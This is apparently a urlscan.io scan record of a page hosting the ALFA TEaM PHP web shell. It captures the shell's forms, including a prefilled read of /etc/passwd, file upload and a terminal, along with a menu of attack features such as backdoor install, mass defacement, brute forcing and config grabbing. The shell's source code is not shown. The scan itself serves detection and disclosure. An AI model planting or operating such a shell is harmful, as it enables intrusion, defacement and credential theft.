zepanae.tiiny.io Open in urlscan Pro
2a01:4ff:f0:d424::1  Public Scan

Submitted URL: http://zepanae.tiiny.io/
Effective URL: https://zepanae.tiiny.io/
Submission: On August 21 via api from US — Scanned from US

Form analysis 11 forms found in the DOM

POST

<form style="display:none;" id="dlForm" action="" target="_blank" method="post">
  <input type="hidden" name="a" value="dlfile">
  <input type="hidden" name="c" value="">
  <input type="hidden" name="file" value="">
</form>

Name: mfPOST

<form method="post" name="mf" style="display:none;">
  <input type="hidden" name="a" value="FilesMan">
  <input type="hidden" name="c" value="/app/"><input type="hidden" name="alfa1" value=""><input type="hidden" name="alfa2" value=""><input type="hidden" name="alfa3" value=""><input type="hidden" name="alfa4" value=""><input type="hidden"
    name="alfa5" value=""><input type="hidden" name="alfa6" value=""><input type="hidden" name="alfa7" value=""><input type="hidden" name="alfa8" value=""><input type="hidden" name="alfa9" value=""><input type="hidden" name="alfa10" value=""><input
    type="hidden" name="charset" value="Windows-1251">
</form>

<form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;"><span class="footer_text">Make File : </span><br><input class="dir" type="text" name="f" value=""> <input
    type="submit" value=" "></form>

<form onsubmit="g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;"><span class="footer_text">Make Dir : </span><br><input class="dir" type="text" name="d" value=" "> <input type="submit" value=" "></form>

<form onsubmit="g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;"><span class="footer_text">Delete : </span><br><input class="dir" type="text" name="del" value=" "> <input type="submit" value=" "></form>

<form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;"><span class="footer_text">Chmod : </span><br><input class="dir" type="text" name="f" value=" "> <input
    type="submit" value=" "></form>

<form onsubmit="g(&quot;FilesMan&quot;,this.c.value,&quot;&quot;);return false;"><span class="footer_text">Change Dir : </span><br><input class="foottable" id="footer_cwd" type="text" name="c" value="/app/"> <input type="submit" value=" "></form>

<form onsubmit="editor(this.file.value,'view','','','','file');return false;"><span><span class="footer_text">Read File : </span></span><br><input class="foottable" type="text" name="file" value="/etc/passwd"> <input type="submit" value=" "></form>

<form style="margin-top: 10px;" onsubmit="return false;" autocomplete="off"><span><span class="footer_text">Execute :</span><br><button onclick="alfaOpenPhpTerminal();return false;" class="foottable alfa_custom_cmd_btn"><img
        style="width:28px;vertical-align: middle;" src="http://solevisible.com/icons/menu/terminal.svg"> Terminal</button><br></span></form>

Name: footer_formPOST

<form onsubmit="u(this);return false;" name="footer_form" method="post" enctype="multipart/form-data">
  <input type="hidden" name="a" value="FilesMAn">
  <input type="hidden" name="c" value="/app/">
  <input type="hidden" name="ajax" value="true">
  <input type="hidden" name="alfa1" value="uploadFile">
  <input type="hidden" name="charset" value="Windows-1251">
  <span class="footer_text">Upload file: </span><span><button id="addup" onclick="addnewup();return false;"><b>+</b></button></span>
  <p id="pfooterup"><label class="inputfile" for="footerup"><span id="__fnameup"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="footerup" class="toolsInp" type="file" name="f[]" onchange="handleup(this,0);" multiple=""></p>
  <input type="submit" name="submit" value=" ">
</form>

<form autocomplete="off" onsubmit="return false;">
  <label class="old-path-lbl"></label>
  <div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;" class="old-path-content"></div>
  <label style="margin-top:10px;" class="new-filename-lbl">New file name</label>
  <input type="text" name="fname">
  <div class="perm-table-holder">
    <table>
      <tbody>
        <tr>
          <td><b>Mode</b></td>
          <td>User</td>
          <td>Group</td>
          <td>World</td>
        </tr>
        <tr>
          <td>Read</td>
          <td><input type="checkbox" name="ur" value="4" onclick="calcperm();"></td>
          <td><input type="checkbox" name="gr" value="4" onclick="calcperm();"></td>
          <td><input type="checkbox" name="wr" value="4" onclick="calcperm();"></td>
        </tr>
        <tr>
          <td>Write</td>
          <td><input type="checkbox" name="uw" value="2" onclick="calcperm();"></td>
          <td><input type="checkbox" name="gw" value="2" onclick="calcperm();"></td>
          <td><input type="checkbox" name="ww" value="2" onclick="calcperm();"></td>
        </tr>
        <tr>
          <td>Execute</td>
          <td><input type="checkbox" name="ux" value="1" onclick="calcperm();"></td>
          <td><input type="checkbox" name="gx" value="1" onclick="calcperm();"></td>
          <td><input type="checkbox" name="wx" value="1" onclick="calcperm();"></td>
        </tr>
        <tr>
          <td>Permission</td>
          <td><input style="width:60px;" type="text" name="u" maxlength="1" oninput="this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, &quot;u&quot;, [&quot;u&quot;]);"></td>
          <td><input style="width:60px;" type="text" name="g" maxlength="1" oninput="this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, &quot;g&quot;, [&quot;g&quot;]);"></td>
          <td><input style="width:60px;" type="text" name="w" maxlength="1" oninput="this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, &quot;w&quot;, [&quot;w&quot;]);"></td>
        </tr>
      </tbody>
    </table>
  </div>
</form>

Text Content

Warning: Trying to access array offset on false in /app/index.php on line 1031

Warning: Trying to access array offset on false in /app/index.php on line 1032

Warning: Trying to access array offset on false in /app/index.php on line 1033

Warning: Trying to access array offset on false in /app/index.php on line 1034
..:: zepanae.tiiny.io ~ ALFA TEaM Shell - v4.1-Tesla ::..



Tesla
Version: 4.1

Uname: wasi wasmer.sh 0.0.0 0.0.0 wasm32 User: [ ] Group: [ ] PHP: 8.3.4 Safe
Mode: OFF ServerIP: 127.0.0.1

Your IP: 127.0.0.100

DateTime: 2024-08-21 07:01:35 Domains: Cant Read [ /etc/named.conf ] HDD:
Total:1 B Free:0 B [0%] useful:--------------Downloader: -------------- Disable
Functions: All Functions Accessible CURL : ON | SSH2 : OFF | Magic Quotes : OFF
| MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: PWD: /app/ [ Home Shell ]

 * Process
 * Eval
 * SQL Manager
 * Database Dumper
 * Column Dumper
 * En-Decoder
 * BC
 * ZONE-H
 * DDOS
 * ByPasser
 * Cgi Shell
 * SSI SHELL
 * Hash Tools
 * Port Scaner
 * Open BaseDir
 * Fake Mail
 * Compressor
 * DeCompressor
 * Index Changer
 * Add New Admin
 * Shell Injectors
 * PHP2XML
 * CloudFlare
 * Whmcs DeCoder
 * Symlink
 * Mass Defacer
 * BruteForcer
 * Searcher
 * Config Grabber
 * Fake Page
 * Archive Manager
 * CMS Hijacker
 * Remote Upload
 * Install BackDoor
 * Whois
 * Remove Shell

Alfa SettingsAlfa marketAbout Us
File manager

New Tab +
[ Stop it ]
ALFA TEAM
0 ( )

Make File :

Make Dir :

Delete :

Chmod :

Change Dir :

Read File :

Execute :
Terminal

Upload file: +

  Choose a file

[ ./AlfaTeam © 2012-2024 ]
Donate Us ! solevisible[at]gmail.com @solevisible


Sql Manager



<<
Clear all
History




0
Database
0
Options
0
Editor
0
Cgi Shell
Open in new tab Open file directly Download View View Archive Edit Move Copy
Rename Modify Change Permissions Compress Extract Delete



New file name

Mode User Group World Read Write Execute Permission

Cancell